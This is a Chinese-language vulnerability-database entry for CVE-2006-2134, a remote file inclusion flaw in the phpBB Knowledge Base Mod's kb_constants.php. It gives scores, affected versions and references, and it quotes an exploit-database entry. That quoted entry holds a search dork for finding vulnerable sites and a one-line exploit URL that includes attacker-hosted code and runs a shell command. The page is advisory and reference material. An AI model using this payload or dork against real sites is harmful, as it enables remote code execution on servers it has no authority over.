CVE-2006-2134
CVSS5.1
发布时间 :2006-05-02 06:02:00
修订时间 :2011-03-07 21:35:25
NMCOE    

[原文]PHP remote file inclusion vulnerability in /includes/kb_constants.php in Knowledge Base Mod for PHPbb 2.0.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the module_root_path parameter.


[CNNVD]phpBB Knowledge Base kb_constants.php 远程文件包含漏洞(CNNVD-200605-035)

        phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。
        phpBB的/includes/kb_constants.php脚本没有正确地检测过滤module_root_path参数的输入,攻击者可以利用这个漏洞包含外部和本地资源的任意脚本文件,从而以Web进程权限执行任意命令。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:phpbb_group:phpbb:1.4.4
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:2.0_beta1
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:1.4.2
cpe:/a:phpbb_group:phpbb:1.0.1
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:1.2.1
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:1.2.0
cpe:/a:phpbb_group:phpbb:1.4.0
cpe:/a:phpbb_group:phpbb:1.4.1
cpe:/a:phpbb_group:phpbb:1.0.0
cpe:/a:phpbb_group:phpbb:2.0_rc2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2134
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2134
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-035
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1585
(UNKNOWN)  VUPEN  ADV-2006-1585
http://secunia.com/advisories/19892
(VENDOR_ADVISORY)  SECUNIA  19892
http://milw0rm.com/exploits/1728
(UNKNOWN)  MILW0RM  1728
http://xforce.iss.net/xforce/xfdb/26279
(UNKNOWN)  XF  kbmod-phpbb-kbconstants-file-include(26279)
http://www.securityfocus.com/bid/17763
(UNKNOWN)  BID  17763

- 漏洞信息

phpBB Knowledge Base kb_constants.php 远程文件包含漏洞
中危 输入验证
2006-05-02 00:00:00 2006-05-02 00:00:00
远程  
        phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。
        phpBB的/includes/kb_constants.php脚本没有正确地检测过滤module_root_path参数的输入,攻击者可以利用这个漏洞包含外部和本地资源的任意脚本文件,从而以Web进程权限执行任意命令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.phpbb2.de/dload.php?action=file&file_id=538

- 漏洞信息 (1728)

Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability (EDBID:1728)
php webapps
2006-04-29 Verified
0 [Oo]
N/A [点击下载]
Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
Dork: "Powered by Knowledge Base"
Credits: [Oo]

Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]
		

- 漏洞信息

25262
phpBB Knowledge Base Mod kb_constants.php module_root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-04-29 Unknow
2006-04-29 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站